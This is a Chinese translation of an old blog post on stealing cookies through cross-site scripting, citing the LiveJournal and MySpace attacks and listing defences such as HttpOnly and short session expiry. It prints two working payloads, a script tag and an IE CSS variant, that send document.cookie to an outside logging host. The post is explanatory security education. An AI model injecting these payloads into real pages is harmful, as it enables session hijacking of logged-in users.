2019独角兽企业重金招聘Python工程师标准>>>

译者按: 10年前的博客似乎有点老了,但是XSS攻击的威胁依然还在,我们不得不防。

原文: XSS - Stealing Cookies 101

译者: Fundebug

为了保证可读性,本文采用意译而非直译。另外,本文版权归原作者所有,翻译仅用于学习。

窃取Cookie是非常简单的,因此不要轻易相信客户端所声明的身份。即便这个Cookie是在数秒之前验证过,那也未必是真的,尤其当你仅使用Cookie验证客户端的时候。

2006年1月,LiveJournal遭到了XSS攻击,这个事件足以警示我们。还有,2006年10月,MySapce也遭到了XSS攻击,这告诉我们必须非常谨慎地过滤用户发布的文本,因为黑客可以在文本中掺杂一些JavaScript代码,以此窃取登陆用户的Cookie

正如黑客攻击LiveJournal那样,你不需要在登陆用户的浏览器进行任何操作,而可以在第三方进行所有操作。更糟糕的是,窃取Cookie事实上操作起来非常简单,但是防范起来却非常困难

下面的的JavaScript代码就可以窃取Cookie,是不是很简单?

<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>

如果我可以将这段代码插入到某个登陆用户的页面,则Cookie就会通过HTTP请求发送给我,然后我就可以伪造那个可怜的登陆用户了!

在IE浏览器上,可以通过在CSS代码中执行JavaScript来窃取Cookie,也很简单。

<style>
.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>

如果你对用户发布的文本内容不进行严格的过滤的话,黑客就可以很方便地窃取Cookie。是不是很可怕?如果你是一个负责任的开发者的话,你就应该保持警惕!因此,你必须假设所有用户的Cookie都被窃取了。注意,是所有用户,对于这一点,我不想含糊其辞。

为了保证安全:请不停地重设session的重设;将过期时间设置短一些;监控referreruserAgent的值;使用HttpOnly禁止脚本读取Cookie。这些措施并非万无一失,但是增加了黑客的难度,因此也是有效的。

如果你对MySapce遭到的XSS攻击不了解,可以查看黑客本人公开的技术细节,很有趣,不过切勿模仿,因为他为自己的行为此付出了不小的代价:三年内被禁止使用电脑!

参考链接

  • 9.3 避免XSS攻击
  • 萨米 (计算机蠕虫)
  • Technical explanation of The MySpace Worm
  • Account Hijackings Force LiveJournal Changes

版权声明:

转载时请注明作者Fundebug以及本文地址:

https://blog.fundebug.com/2017/08/16/xss_steal_cookie/

转载于:https://my.oschina.net/u/3375885/blog/1510411

XSS攻击之窃取Cookie相关推荐

  1. XSS漏洞利用之cookie获取

    目录 环境搭建 盗取cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是 ...

  2. 如何php防止XSS攻击

    什么是XSS:这里通俗的讲,就像是SQL注入一样,XSS攻击也可以算是对HTML和JS的一种注入.你本来希望得到是从用户那得到一段有用的文本文字,但用户提交给你的却是别有用心的可执行javascrip ...

  3. html获取cookie_知了汇智《XSS攻击-盗取cookie实战》课程文档讲解

    文章来源:知了汇智冯老师 今天是<web安全-XSS攻击>系列的最后一篇啦,希望大家好好学习哦~ XSS之 知了汇智-禁卫实验室(GoDun.F) 1. 编写获取cookie的代码cook ...

  4. xss漏洞-DVWA跨站攻击盗取用户cookie值

    程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style ...

  5. Lab: Exploiting cross-site scripting to steal cookies:利用XSS窃取Cookie

    靶场内容 本实验包含博客评论功能中的存储型 XSS漏洞.一个模拟的受害者用户在发布后查看所有评论.为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者. 注意 为了 ...

  6. 技巧:XSS漏洞结合nc窃取Cookie实现免密码登录

    XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!) 如果某天不能用外网,也不能用kali 存储型xss最重要的是获取用户的cookie!!!! ...

  7. php httponly_php设置cookie为HttpOnly防止XSS攻击

    什么时XSS攻击? XSS攻击(Cross Site Scripting)中文名为跨站脚本攻击,XSS攻击时web中一种常见的漏洞.通过XSS漏洞可以伪造目标用户登录,从而获取登录后的账号操作. 网站 ...

  8. XSS跨站脚本攻击防御和Cookie,及SSO单点登录原理

    XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性.其原理是攻击者向有XSS漏洞的网站中输入 ...

  9. 安全测试之XSS攻击

    XSS (跨站脚本攻击)是什么?它的全名是:Cross-site scripting,为了和CSS层叠样式表区分所以取名XSS.是一种网站应用程序的安全漏洞攻击,是代码注入的一种.它允许恶意用户将代码 ...

最新文章

  1. stm32 sdio acmd41 无响应。一直是返回0x3f。解决方法是清除crc错误中断
  2. 诗与远方:无题(二十九)
  3. 如何使用QoS管理分配存储IOPS?
  4. 小知识--局域网内的文件共享
  5. 计算机刷bios版本,怎么更新主板bios版本_教你更新技嘉主板bios版本的方法
  6. Pytorch如何约束神经网络中权重/偏执的范围
  7. 电脑每隔约半分钟弹出this computer is being attacked
  8. Cadence基础知识4(焊盘制作比较重要的3点以及热风焊盘的作用和制作 )
  9. QQTIM怎么成功修改个人文件夹保存位置
  10. Flutter学习之倒计时计时器
  11. Matlab通过整除判断倍数
  12. UVA一些简单题题解。
  13. 定时启动软件的脚本。同时也适用于定时打开游戏。
  14. 微信小程序结合mpvue从0到1(二)
  15. STM32循迹小车系列教程(三)—— 使用灰度传感器循迹
  16. CCF推荐会议 | 人机交互:截稿日期纵览 (含CSCW, UbiComp, collaboratecom 等会议微信交流群)
  17. 【STS】解决中文乱码问题
  18. 子不语启动招股:业绩开始下滑,存在破发风险,由华丙如夫妇控股
  19. Java实现最小生成树算法(Prim算法)
  20. 让你的编程之路少点坎坷,10个编程技巧、5个纠错步骤

热门文章

  1. 机器学习框架_一个框架解决几乎所有机器学习问题
  2. linux系统下如何查看cpu能同时跑几个线程_探讨基于Linux的NUMA系统
  3. 中点坐标公式 矩形_二次函数中矩形的存在性问题
  4. vue 心跳监控_【笔记】vue中websocket心跳机制
  5. _捷豹F-pace汽车音响改装黄金声学,中道隔音——哈尔滨小蒋
  6. “invalid index of a 0-dim tensor. Use tensor.item() to convert a 0-dim tensor to a Python”解决办法
  7. Vivado如何计算关键路径的建立时间裕量?(实践篇)
  8. FPGA之道(41)HDL的三种描述方式
  9. 【 MATLAB 】如何产生一个均值和方差可控的正态分布矩阵(randn)?
  10. 探秘早期的FPGA内部构造